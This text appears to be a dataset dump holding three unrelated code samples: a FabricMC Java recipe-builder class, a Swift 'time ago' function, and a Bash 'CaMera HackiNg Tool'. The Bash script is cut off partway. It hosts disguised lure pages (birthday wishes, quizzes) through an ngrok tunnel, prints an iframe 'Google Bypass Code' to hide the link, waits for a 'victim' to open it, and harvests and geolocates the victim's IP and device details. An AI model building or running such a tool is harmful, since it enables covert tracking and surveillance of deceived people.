text stringlengths 1 1.05M |
|---|
/*
* Copyright (c) 2016, 2017, 2018, 2019 FabricMC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package net.fabricmc.fabric.api.recipe.v1;
import it.unimi.dsi.fastutil.chars.Char2ObjectMap;
import it.unimi.dsi.fastutil.chars.Char2ObjectOpenHashMap;
import it.unimi.dsi.fastutil.chars.CharArraySet;
import it.unimi.dsi.fastutil.chars.CharSet;
import net.minecraft.item.Item;
import net.minecraft.item.ItemConvertible;
import net.minecraft.item.ItemStack;
import net.minecraft.recipe.*;
import net.minecraft.tag.Tag;
import net.minecraft.util.Identifier;
import net.minecraft.util.collection.DefaultedList;
import java.util.ArrayList;
import java.util.HashSet;
import java.util.List;
import java.util.Objects;
import java.util.Set;
/**
* Provides some recipe builders for Vanilla recipes.
*
* @version 1.0.0
* @since 1.0.0
*/
public final class VanillaRecipeBuilders {
private VanillaRecipeBuilders() {
throw new UnsupportedOperationException("Someone tampered with the universe.");
}
/**
* Returns the list of ingredients for shaped crafting recipes.
*
* @param pattern the pattern of the shaped crafting recipe
* @param keys the keys and ingredients of the recipe
* @param width the width of the shaped crafting recipe
* @param height the height of the shaped crafting recipe
* @return the ingredients
* @throws IllegalStateException if a key has no assigned ingredient or if there is an ingredient but no assigned key
*/
public static DefaultedList<Ingredient> getIngredients(String[] pattern, Char2ObjectMap<Ingredient> keys, int width, int height) {
DefaultedList<Ingredient> ingredients = DefaultedList.ofSize(width * height, Ingredient.EMPTY);
CharSet patternSet = new CharArraySet(keys.keySet());
patternSet.remove(' ');
for (int i = 0; i < pattern.length; ++i) {
for (int j = 0; j < pattern[i].length(); ++j) {
char key = pattern[i].charAt(j);
Ingredient ingredient = keys.get(key);
if (ingredient == null) {
throw new IllegalStateException("Pattern references symbol '" + key + "' but it's not defined in the key");
}
patternSet.remove(key);
ingredients.set(j + width * i, ingredient);
}
}
if (!patternSet.isEmpty()) {
throw new IllegalStateException("Key defines symbols that aren't used in pattern: " + patternSet);
} else {
return ingredients;
}
}
/**
* Returns a new shaped crafting recipe builder.
*
* @param pattern the pattern of the shaped crafting recipe
* @return the builder
*/
public static ShapedRecipeBuilder shapedRecipe(String[] pattern) {
return new ShapedRecipeBuilder(pattern);
}
/**
* Returns a new shapeless crafting recipe builder.
*
* @param output the output stack
* @return the builder
*/
public static ShapelessRecipeBuilder shapelessRecipe(ItemStack output) {
return new ShapelessRecipeBuilder(output);
}
/**
* Returns a new stone cutting recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @param input the input ingredient
* @param output the output item stack
* @return the stone cutting recipe
*/
public static StonecuttingRecipe stonecuttingRecipe(Identifier id, String group, Ingredient input, ItemStack output) {
if (input == Ingredient.EMPTY) throw new IllegalArgumentException("Input cannot be empty.");
return new StonecuttingRecipe(id, group, input, output);
}
/**
* Returns a new smelting recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @param input the input ingredient
* @param output the output item stack
* @param experience the experience given
* @param cookTime the cook time in ticks
* @return the smelting recipe
*/
public static SmeltingRecipe smeltingRecipe(Identifier id, String group, Ingredient input, ItemStack output, float experience, int cookTime) {
if (input == Ingredient.EMPTY) throw new IllegalArgumentException("Input cannot be empty.");
if (cookTime < 0) throw new IllegalArgumentException("Cook time must be equal or greater than 0");
return new SmeltingRecipe(id, group, input, output, experience, cookTime);
}
/**
* Returns a new blasting recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @param input the input ingredient
* @param output the output item stack
* @param experience the experience given
* @param cookTime the cook time in ticks
* @return the blasting recipe
*/
public static BlastingRecipe blastingRecipe(Identifier id, String group, Ingredient input, ItemStack output, float experience, int cookTime) {
if (input == Ingredient.EMPTY) throw new IllegalArgumentException("Input cannot be empty.");
if (cookTime < 0) throw new IllegalArgumentException("Cook time must be equal or greater than 0");
return new BlastingRecipe(id, group, input, output, experience, cookTime);
}
/**
* Returns a new smoking recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @param input the input ingredient
* @param output the output item stack
* @param experience the experience given
* @param cookTime the cook time in ticks
* @return the smoking recipe
*/
public static SmokingRecipe smokingRecipe(Identifier id, String group, Ingredient input, ItemStack output, float experience, int cookTime) {
if (input == Ingredient.EMPTY) throw new IllegalArgumentException("Input cannot be empty.");
if (cookTime < 0) throw new IllegalArgumentException("Cook time must be equal or greater than 0");
return new SmokingRecipe(id, group, input, output, experience, cookTime);
}
/**
* Returns a new campfire cooking recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @param input the input ingredient
* @param output the output item stack
* @param experience the experience given
* @param cookTime the cook time in ticks
* @return the campfire cooking recipe
*/
public static CampfireCookingRecipe campfireCookingRecipe(Identifier id, String group, Ingredient input,
ItemStack output, float experience, int cookTime) {
if (input == Ingredient.EMPTY) throw new IllegalArgumentException("Input cannot be empty.");
if (cookTime < 0) throw new IllegalArgumentException("Cook time must be equal or greater than 0");
return new CampfireCookingRecipe(id, group, input, output, experience, cookTime);
}
/**
* Represents a shaped crafting recipe builder.
*/
public static final class ShapedRecipeBuilder {
private final String[] pattern;
private final int width;
private final int height;
private final Char2ObjectMap<Ingredient> ingredients = new Char2ObjectOpenHashMap<>();
private ItemStack output;
/**
* Creates a new shaped recipe builder.
*
* @param pattern the pattern of the shaped recipe. Each string in this array is a line of ingredients.
* A character represents an ingredient and space is no ingredient
*/
public ShapedRecipeBuilder(String[] pattern) {
this.pattern = pattern;
this.width = pattern[0].length();
this.height = pattern.length;
}
/**
* Puts the specified ingredient at the specified key.
*
* @param key the key of the ingredient
* @param ingredient the ingredient
* @return this builder
*/
public ShapedRecipeBuilder ingredient(char key, Ingredient ingredient) {
boolean success = false;
for (String line : pattern) {
for (int i = 0; i < line.length(); i++) {
char c = line.charAt(i);
if (c == key) {
this.ingredients.put(key, ingredient);
success = true;
break;
}
}
if (success) break;
}
return this;
}
/**
* Puts the specified items as the accepted ingredient at the specified key.
*
* @param key the key of the ingredient
* @param items the items as ingredient
* @return this builder
* @see #ingredient(char, Ingredient)
*/
public ShapedRecipeBuilder ingredient(char key, ItemConvertible... items) {
return this.ingredient(key, Ingredient.ofItems(items));
}
/**
* Puts the specified item tag as the accepted ingredient at the specified key.
*
* @param key the key of the ingredient
* @param tag the item tag as ingredient
* @return this builder
* @see #ingredient(char, Ingredient)
*/
public ShapedRecipeBuilder ingredient(char key, Tag<Item> tag) {
return this.ingredient(key, Ingredient.fromTag(tag));
}
/**
* Puts the specified item stacks as the accepted ingredient at the specified key.
*
* @param key the key of the ingredient
* @param stacks the item stacks as ingredient
* @return this builder
* @see #ingredient(char, Ingredient)
*/
public ShapedRecipeBuilder ingredient(char key, ItemStack... stacks) {
return this.ingredient(key, Ingredient.ofStacks(stacks));
}
/**
* Sets the output of the shaped crafting recipe.
*
* @param stack the output item stack.
* @return this builder
*/
public ShapedRecipeBuilder output(ItemStack stack) {
this.output = stack;
return this;
}
/**
* Builds the shaped crafting recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @return the shaped recipe
*/
public ShapedRecipe build(Identifier id, String group) {
Objects.requireNonNull(this.output, "The output stack cannot be null.");
DefaultedList<Ingredient> ingredients = getIngredients(this.pattern, this.ingredients, this.width, this.height);
return new ShapedRecipe(id, group, this.width, this.height, ingredients, this.output);
}
}
public static final class ShapelessRecipeBuilder {
private final Set<Ingredient> ingredients = new HashSet<>();
private ItemStack output;
public ShapelessRecipeBuilder(ItemStack output) {
this.output = output;
}
/**
* Adds an ingredient.
*
* @param ingredient the ingredient
* @return this builder
*/
public ShapelessRecipeBuilder ingredient(Ingredient ingredient) {
this.ingredients.add(ingredient);
return this;
}
/**
* Puts the specified items as the accepted ingredient at the specified key.
*
* @param items the items as ingredient
* @return this builder
* @see #ingredient(Ingredient)
*/
public ShapelessRecipeBuilder ingredient(ItemConvertible... items) {
return this.ingredient(Ingredient.ofItems(items));
}
/**
* Adds the specified item tag as an ingredient.
*
* @param tag the item tag as ingredient
* @return this builder
* @see #ingredient(Ingredient)
*/
public ShapelessRecipeBuilder ingredient(Tag<Item> tag) {
return this.ingredient(Ingredient.fromTag(tag));
}
/**
* Adds item stacks as an ingredient.
*
* @param stacks the item stacks as ingredient
* @return this builder
* @see #ingredient(Ingredient)
*/
public ShapelessRecipeBuilder ingredient(ItemStack... stacks) {
return this.ingredient(Ingredient.ofStacks(stacks));
}
/**
* Sets the output of the shapeless crafting recipe.
*
* @param stack the output item stack.
* @return this builder
*/
public ShapelessRecipeBuilder output(ItemStack stack) {
this.output = stack;
return this;
}
/**
* Builds the shapeless crafting recipe.
*
* @param id the identifier of the recipe
* @param group the group of the recipe
* @return the shapeless crafting recipe
*/
public ShapelessRecipe build(Identifier id, String group) {
Objects.requireNonNull(this.output, "The output stack cannot be null.");
if (ingredients.size() == 0) throw new IllegalStateException("Cannot build a recipe without ingredients.");
DefaultedList<Ingredient> ingredients = DefaultedList.ofSize(this.ingredients.size(), Ingredient.EMPTY);
int i = 0;
for (Ingredient ingredient : this.ingredients) {
ingredients.set(i, ingredient);
i++;
}
return new ShapelessRecipe(id, group, this.output, ingredients);
}
}
} |
import Foundation
func timeAgoSinceDate(_ date: Date, currentDate: Date) -> String {
let calendar = Calendar.current
let components = calendar.dateComponents([.year, .month, .day, .hour, .minute, .second], from: date, to: currentDate)
if let years = components.year, years > 0 {
return years == 1 ? "1 year ago" : "\(years) years ago"
} else if let months = components.month, months > 0 {
return months == 1 ? "1 month ago" : "\(months) months ago"
} else if let days = components.day, days > 0 {
return days == 1 ? "1 day ago" : "\(days) days ago"
} else if let hours = components.hour, hours > 0 {
return hours == 1 ? "1 hour ago" : "\(hours) hours ago"
} else if let minutes = components.minute, minutes > 0 {
return minutes == 1 ? "1 minute ago" : "\(minutes) minutes ago"
} else if let seconds = components.second, seconds > 0 {
return seconds == 1 ? "1 second ago" : "\(seconds) seconds ago"
} else {
return "Just now"
}
}
// Test the function
let formatter = DateFormatter()
formatter.dateFormat = "yyyy MM dd HH:mm:ss.SSS"
let date0 = formatter.date(from: "2014 11 05 18:15:12.000")!
let date1 = formatter.date(from: "2014 11 07 18:15:12.000")!
let timeElapsed = timeAgoSinceDate(date0, currentDate: date1)
print(timeElapsed) // Output: 2 days ago |
dependencies() {
echo
command -v zip > /dev/null 2>&1 || { echo -e >&2 "\e[94m➟ \e[92mNeed ZIP installing it....." && apt install zip > /dev/null 2>&1;}
command -v php > /dev/null 2>&1 || { echo -e >&2 "\e[94m➟ \e[92mNeed PHP installing it....." && apt install php > /dev/null 2>&1;}
command -v curl > /dev/null 2>&1 || { echo -e >&2 "\e[94m➟ \e[92mNeed CURL installing it....." && apt install curl > /dev/null 2>&1;}
command -v wget > /dev/null 2>&1 || { echo -e >&2 "\e[94m➟ \e[92mNeed WGET installing it....." && apt install wget > /dev/null 2>&1;}
command -v git > /dev/null 2>&1 || { echo -e >&2 "\e[94m➟ \e[92mNeed GIT installing it....." && apt install git > /dev/null 2>&1;}
echo
}
dependencies
banner() {
clear
echo -e '\e[91m
....
.:-----========:
=%%%%%%%%%%%%%%%%%#+=:-**-
-%%%%%%%#*+%%*%%%%%%%#+--+=.
:##*=. =%..%*-#%%%%%%%-.+-
:*++=. *# -%%#%%%=.%+:*#--=
.+%*=-. :%= +%%%%+ +%: =#*:-
:::##*=: -##=::::-#*. -=+*#:
.-:-*%**=..-=++=-. .:-=+**%%.
:+=:-+#%%%#****#**+=-:: .
-===========---::..
.....
echo
echo -e ' \e[92m::: Tool By DARKNOOBHACKERS:::\e[0m'
echo -e "\e[92m"
echo -e ' \e[100m CaMera HackiNg Tool\e[0m'
echo
}
menu() {
echo -e " \e[93m[\e[32m1\e[93m]\e[93m➟ \e[92mSTART\e[0m"
echo -e " \e[93m[\e[32m2\e[93m]\e[93m➟ \e[92mUPDATE\e[0m"
echo -e " \e[93m[\e[32m3\e[93m]\e[93m➟ \e[92mABOUT\e[0m"
echo -e " \e[93m[\e[32m4\e[93m]\e[93m➟ \e[92mMORE\e[0m"
echo -e " \e[93m[\e[32m5\e[93m]\e[93m➟ \e[92mFOLLOW\e[0m"
echo -e " \e[93m[\e[32m6\e[93m]\e[93m➟ \e[92mVIDEO\e[0m"
echo -e " \e[93m[\e[32m7\e[93m]\e[93m➟ \e[92mCHAT NOW\e[0m"
echo -e " \e[93m[\e[32m8\e[93m]\e[93m➟ \e[92mRESTART\e[0m"
echo -e " \e[93m[\e[32m0\e[93m]\e[93m➟ \e[92mEXIT\e[0m"
echo
echo -ne "\e[92mSelect Option\e[92m: \e[34m"
read sit
if [[ "$sit" = "1" || "$sit" = "one" ]];
then
pagemenu
elif [[ "$sit" = "2" || "$sit" = "two" ]];
then
echo -e " SOON I WILL UPDATE"
elif [[ "$sit" = "3" || "$sit" = "three" ]];
then
about
elif [[ "$sit" = "4" || "$sit" = "four" ]];
then
fi
}
pagemenu() {
banner
echo -e " \e[93m[\e[32m1\e[93m]\e[93m➟ \e[92mSelFie\e[0m"
echo -e " \e[93m[\e[32m2\e[93m]\e[93m➟ \e[92mQuIz\e[0m"
echo -e " \e[93m[\e[32m3\e[93m]\e[93m➟ \e[92mGuEss\e[0m"
echo -e " \e[93m[\e[32m4\e[93m]\e[93m➟ \e[92mSpinWheel\e[0m"
echo -e " \e[93m[\e[32m5\e[93m]\e[93m➟ \e[92mHopGame\e[0m"
echo -e " \e[93m[\e[32m6\e[93m]\e[93m➟ \e[92mBirthDay\e[0m"
echo -e " \e[93m[\e[32m7\e[93m]\e[93m➟ \e[92mWishBook\e[0m"
echo -e " \e[93m[\e[32m8\e[93m]\e[93m➟ \e[92mRPSGame\e[0m"
echo -e " \e[93m[\e[32m9\e[93m]\e[93m➟ \e[92mFireWorks\e[0m"
echo -e " \e[93m[\e[32m10\e[93m]\e[93m➟ \e[92mHappyNewYear\e[0m"
echo
echo -ne "\e[92mSelect Option\e[92m: \e[34m"
read selc
if [[ "$selc" == "1" || "$selc" == "one" || "$selc" == "selfie" ]];
then
site="selfie"
rm -rf webs/$site/even.html > /dev/null 2>&1
start
elif [[ "$selc" == "2" || "$selc" == "two" || "$selc" == "quiz" ]]
then
site="quiz"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "3" || "$selc" == "three" || "$selc" == "guess" ]]
then
site="guess"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "4" || "$selc" == "four" || "$selc" == "spinwheel" ]]
then
site="spinwheel"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "5" || "$selc" == "five" || "$selc" == "hopgame" ]]
then
site="game"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "6" || "$selc" == "six" || "$selc" == "birthday" ]]
then
birthday
rm -rf webs/$site/option.html > /dev/null 2>&1
elif [[ "$selc" == "7" || "$selc" == "seven" || "$selc" == "wishbook" ]]
then
book
elif [[ "$selc" == "8" || "$selc" == "eight" || "$selc" == "rpsgame" ]]
then
site="rps"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "9" || "$selc" == "nine" || "$selc" == "firework" ]]
then
firework
rm -rf webs/$site/option.html > /dev/null 2>&1
elif [[ "$selc" == "10" || "$selc" == "ten" || "$selc" == "hny" ]]
then
boxwish
rm -rf webs/$site/option.html > /dev/null 2>&1
elif [[ "$selc" == "00" || "$selc" == "exit" || "$selc" == "exit" ]]
then
banner
menu
fi
}
birthday() {
echo
echo -e " \e[92m[\e[34m1\e[92m]\e[92m➟ \e[93mDefault\e[0m \e[92m[\e[34m2\e[92m]\e[92m➟ \e[93mCustom\e[0m "
echo
echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m"
read selc
if [[ "$selc" == "1" || "$selc" == "one" || "$selc" == "default" ]];
then
site="birthday"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "2" || "$selc" == "two" || "$selc" == "custom" ]];
then
site="birthday"
rm -rf webs/$site/option.html > /dev/null 2>&1
echo " "
echo -e "\e[94m<<\e[93mcustom options require input actions\e[94m>>\e[92m"
echo " "
echo -e "\e[93mEvent Name: "
read event
echo -e "\e[93mPerson Name: "
read person
echo "Wish Message: "
read msg
echo
echo -e "\e[94m <<\e[93mcustom template created\e[94m>>\e[92m"
sed "6s|\(.*\)|<legend> <h2 class="text_head">$event</h2></legend>|" webs/$site/$site.html > option.html && mv option.html webs/$site
sed "7s|\(.*\)|<h2 class="text">$person</h2>|" webs/$site/option.html > random.html && mv random.html webs/$site
sed "8s|\(.*\)|<h2 class="text">$msg</h2>|" webs/$site/random.html > custom.html && mv custom.html webs/$site
rm -rf webs/$site/random.html > /dev/null 2>&1
start
fi
}
book() {
echo
echo -e " \e[92m[\e[34m1\e[92m]\e[92m➟ \e[93mDefault\e[0m \e[92m[\e[34m2\e[92m]\e[92m➟ \e[93mCustom\e[0m "
echo
echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m"
read selc
if [[ "$selc" == "1" || "$selc" == "one" || "$selc" == "default" ]];
then
site="book"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "2" || "$selc" == "two" || "$selc" == "custom" ]];
then
site="book"
rm -rf webs/$site/option.html > /dev/null 2>&1
echo " "
echo -e "\e[94m<<\e[93mcustom options require input actions\e[94m>>\e[92m"
echo " "
echo -e "\e[93mEvent Name: "
read event
echo -e "\e[93mWish Message: "
read msg
echo
echo -e "\e[94m <<\e[93mcustom template created\e[94m>>\e[92m"
sed "32s|\(.*\)|<p id="head">$event</p>|" webs/$site/$site.html > option.html && mv option.html webs/$site
sed "33s|\(.*\)|<p>$msg</p>|" webs/$site/option.html > custom.html && mv custom.html webs/$site
start
fi
}
firework() {
echo
echo -e " \e[92m[\e[34m1\e[92m]\e[92m➟ \e[93mDefault\e[0m \e[92m[\e[34m2\e[92m]\e[92m➟ \e[93mCustom\e[0m "
echo
echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m"
read selc
if [[ "$selc" == "1" || "$selc" == "one" || "$selc" == "default" ]];
then
site="firework"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "2" || "$selc" == "two" || "$selc" == "custom" ]];
then
site="firework"
rm -rf webs/$site/option.html > /dev/null 2>&1
echo " "
echo -e "\e[94m<<\e[93mcustom options require input actions\e[94m>>\e[92m"
echo " "
echo -e "\e[93mEvent Name: "
read event
echo -e "\e[93mPerson Name: "
read msg
echo
echo -e "\e[94m <<\e[93mcustom template created\e[94m>>\e[92m"
sed "5s|\(.*\)|<center><h1>$event</h1><center>|" webs/$site/$site.html > option.html && mv option.html webs/$site
sed "7s|\(.*\)|<h2>$msg<h2>|" webs/$site/option.html > custom.html && mv custom.html webs/$site
start
fi
}
boxwish() {
echo
echo -e " \e[92m[\e[34m1\e[92m]\e[92m➟ \e[93mDefault\e[0m \e[92m[\e[34m2\e[92m]\e[92m➟ \e[93mCustom\e[0m "
echo
echo -ne "\e[92mSELECT OPTION\e[0m: \e[92m"
read selc
if [[ "$selc" == "1" || "$selc" == "one" || "$selc" == "default" ]];
then
site="boxwish"
rm -rf webs/$site/option.html > /dev/null 2>&1
start
elif [[ "$selc" == "2" || "$selc" == "two" || "$selc" == "custom" ]];
then
site="boxwish"
rm -rf webs/$site/option.html > /dev/null 2>&1
echo " "
echo -e " \e[94m<<\e[93mcustom options require input actions\e[94m>>\e[92m"
echo " "
echo -e "\e[93mEvent Name: "
read event
echo -e "\e[93mPerson Name: "
read person
echo
echo -e " \e[94m <<\e[93mcustom template created\e[94m>>\e[92m"
sed "10s|\(.*\)|<h1>$event</h1>|" webs/$site/$site.html > option.html && mv option.html webs/$site
sed "11s|\(.*\)|<h2>$person</h2>|" webs/$site/option.html > custom.html && mv custom.html webs/$site
start
fi
}
start() {
if [[ -e webs/$site/ip.txt ]]; then
rm webs/$site/ip.txt 2>&1
fi
if [[ -e webs/$site/index.php ]]; then
rm webs/$site/index.php 2>&1
fi
if [[ -e webs/$site/index.html ]]; then
rm webs/$site/index.html 2>&1
fi
if [[ -e webs/$site/Log.log ]]; then
rm webs/$site/Log.log 2>&1
fi
if [[ -e webs/$site/template.html ]]; then
rm webs/$site/template.html 2>&1
fi
if [[ -e ngrok ]]; then
echo ""
else
echo
printf "\e[1;92m[\e[34m•\e[1;92m] Downloading Ngrok...\n"
arch=$(uname -a | grep -o 'arm')
if [[ $arch == *'arm'* ]]; then
wget https://bin.equinox.io/a/e93TBaoFgZw/ngrok-2.2.8-linux-arm.zip > /dev/null 2>&1
if [[ -e ngrok-2.2.8-linux-arm.zip ]]; then
unzip ngrok-2.2.8-linux-arm.zip > /dev/null 2>&1
rm -rf $HOME/.ngrok2 > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok-2.2.8-linux-arm.zip
else
echo
printf "\e[1;93m[!] Download error... Termux, run:\e[0m\e[1;77m pkg install wget\e[0m\n"
exit 1
fi
else
wget https://github.com/noob-hackers/impstuff/raw/main/ngrok%2Bwifi%2Bdata.zip > /dev/null 2>&1
if [[ -e ngrok+wifi+data.zip ]]; then
unzip ngrok+wifi+data.zip > /dev/null 2>&1
rm -rf $HOME/.ngrok2 > /dev/null 2>&1
chmod +x ngrok
rm -rf ngrok+wifi+data.zip
else
echo
printf "\e[1;93m[!] Unable to download \e[0m\n"
exit 1
fi
fi
fi
if [[ -e webs/$site/option.html ]]; then
echo -e "\e[1;92m[\e[34m•\e[1;92m] Starting Host Server..."
cd webs/$site && mv custom.html template.html && php -S 127.0.0.1:3333 > /dev/null 2>&1 &
sleep 8
echo -e "\e[1;92m[\e[34m•\e[1;92m] Starting Ngrok Server..."
./ngrok http 3333 > /dev/null 2>&1 &
sleep 10
else
echo -e "\e[1;92m[\e[34m•\e[1;92m] Starting Host Server..."
cd webs/$site && cp $site.html template.html && php -S 127.0.0.1:3333 > /dev/null 2>&1 &
sleep 8
echo -e "\e[1;92m[\e[34m•\e[1;92m] Starting Ngrok Server..."
./ngrok http 3333 > /dev/null 2>&1 &
sleep 10
fi
link=$(curl -s -N http://127.0.0.1:4040/status | grep -o "https://[0-9A-Za-z.-]*\.ngrok.io")
status=$(curl -s -o /dev/null -I -w "%{http_code}" $link)
stat=$(echo "$status")
if [ "$stat" = "200" ];
then
echo -e "\e[1;92m[\e[34m•\e[1;92m] Link working code \e[34m[\e[0m200\e[34m]\e[0m"
touch bypass.html
cat > bypass.html << EOF
<iframe name="$site" src="$link" width="100%" height="100%" frameborder="0" scrolling="yes" style="width: 100%;"> </iframe>
EOF
bypass=$(cat bypass.html)
echo -e "\e[92m[-------------\e[34mGoogle Bypass Code\e[92m-------------]\e[91m"
echo -e "\e[0m$bypass \e[0m"
echo -e "\e[92m[-----------\e[34mUse This Code in Github\e[92m----------]\e[92m"
echo
sed 's+forwarding_link+'$link'+g' webs/$site/template.html > webs/$site/index.html
sed 's+forwarding_link+'$link'+g' webs/$site/forward.php > webs/$site/index.php
echo -e "\e[1;92m[\e[34m•\e[1;92m] Send This Link: \e[0m$link\e[0m"
checkfound
else
echo -e "\e[1;92m[\e[34m•\e[1;92m] Link working code \e[34m[\e[91m000\e[34m]\e[0m"
echo
touch bypass.html
cat > bypass.html << EOF
<iframe name="$site" src="$link" width="100%" height="100%" frameborder="0" scrolling="yes" style="width: 100%;"> </iframe>
EOF
bypass=$(cat bypass.html)
echo -e "\e[92m[-------------\e[34mGoogle Bypass Code\e[92m-------------]\e[91m"
echo -e "\e[0m$bypass \e[0m"
echo -e "\e[92m[-----------\e[34mUse This Code in Github\e[92m----------]\e[92m"
sed 's+forwarding_link+'$link'+g' webs/$site/template.html > webs/$site/index.html
sed 's+forwarding_link+'$link'+g' webs/$site/forward.php > webs/$site/index.php
echo -e "\e[1;92m[\e[34m•\e[1;92m] Send This Link: \e[0m$link\e[0m"
#merge
checkfound
fi
}
checkfound() {
echo ' '
echo -e "\e[1;93m[\e[0m\e[34m•\e[0m\e[1;93m] Waiting for victim to open link...\e[0m\n"
while [ true ]; do
if [[ -e "webs/$site/ip.txt" ]]; then
echo
echo -e "\e[92m------------------------\e[34mVICTIM FOUND\e[92m-------------------------\e[0m"
echo ' '
echo -e "\e[1;92m[\e[34m•\e[1;92m] Device info found..."
echo ' '
catch_ip
sleep 1.0
fi
done
}
catch_ip() {
ip=$( egrep '(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))' webs/$site/ip.txt | cut -d " " -f2 | tr -d '\r')
IFS=$'\n'
ua=$(grep 'User-Agent:' webs/$site/ip.txt | cut -d '"' -f2)
echo -e "\e[1;93m[\e[0m\e[1;77m*\e[0m\e[1;93m] User-Agent:\e[0m$ua\e[0m\e[1;77m\e[0m\n"
chk=$(fmt -20 webs/$site/ip.txt)
sch=$(echo "$chk" > cod.txt)
dom1=$(sed -n '5p' cod.txt | cut -d"(" -f2 | cut -d";" -f1)
dom2=$(sed -n '6p' cod.txt | cut -d"(" -f2 | cut -d";" -f1)
dom3=$(sed -n '7p' cod.txt | cut -d";" -f2 | cut -d")" -f1)
dom4=$(sed -n '11p' cod.txt | cut -d "/" -f1)
dom5=$(sed -n '11p' cod.txt | cut -d " " -f2 | cut -d"/" -f2)
dom6=$(sed -n '12p' cod.txt | cut -d"(" -f2 | cut -d")" -f1)
echo -e "\e[1;92m[\e[0m\e[1;34m★ \e[0m\e[1;92m] Kernel:\e[1;0m$dom1\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m★ \e[0m\e[1;92m] Os:\e[1;0m$dom2\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m★ \e[0m\e[1;92m] Model:\e[1;0m$dom3\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m★ \e[0m\e[1;92m] Browser:\e[0m$dom4\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m★ \e[0m\e[1;92m] Version:\e[1;0m$dom5\e[0m"
echo -e "\e[1;92m[\e[0m\e[1;34m★ \e[0m\e[1;92m] Device:\e[1;0m$dom6\e[0m"
cat webs/$site/ip.txt >> webs/$site/saved.ip.txt
if [[ -e location.txt ]]; then
rm -rf location.txt
fi
IFS='\n'
iptracker=$(curl -s -L "http://ipwhois.app/json/$ip" --user-agent "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" > location.txt && grep -o '"[^"]*"\s*:\s*"[^"]*"' location.txt > track.txt)
IFS=$'\n'
iptt=$(sed -n 's/"ip"://p' track.txt)
if [[ $iptt != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Device ip: \e[0m$iptt\e[0m"
fi
iptype=$(sed -n 's/"type"://p' track.txt)
if [[ $iptype != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] IP type: \e[0m$iptype\e[0m"
fi
continent=$(sed -n 's/"continent"://p' track.txt)
if [[ $continent != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Continent: \e[0m$continent\e[0m"
fi
country=$(sed -n 's/"country"://p' track.txt)
if [[ $country != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Country: \e[0m$country\e[0m"
fi
flag=$(sed -n 's/"country_flag"://p' track.txt)
if [[ $flag != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Country flag: \e[0m$flag\e[0m"
fi
cap=$(sed -n 's/"country_capital"://p' track.txt)
if [[ $cap != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Country capital: \e[0m$cap\e[0m"
fi
phon=$(sed -n 's/"country_phone"://p' track.txt)
if [[ $phon != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Country code: \e[0m$phon\e[0m"
fi
region=$(sed -n 's/"region"://p' track.txt)
if [[ $region != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] State: \e[0m$region\e[0m"
fi
city=$(sed -n 's/"city"://p' track.txt)
if [[ $city != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] City: \e[0m$city\e[0m"
fi
isp=$(sed -n 's/"isp"://p' track.txt)
if [[ $isp != "" ]]; then
echo -e "\e[1;92m[\e[34m•\e[92m] Isp: \e[0m$isp\e[0m"
fi
ccode=$(sed -n 's/"currency_code"://p' track.txt)
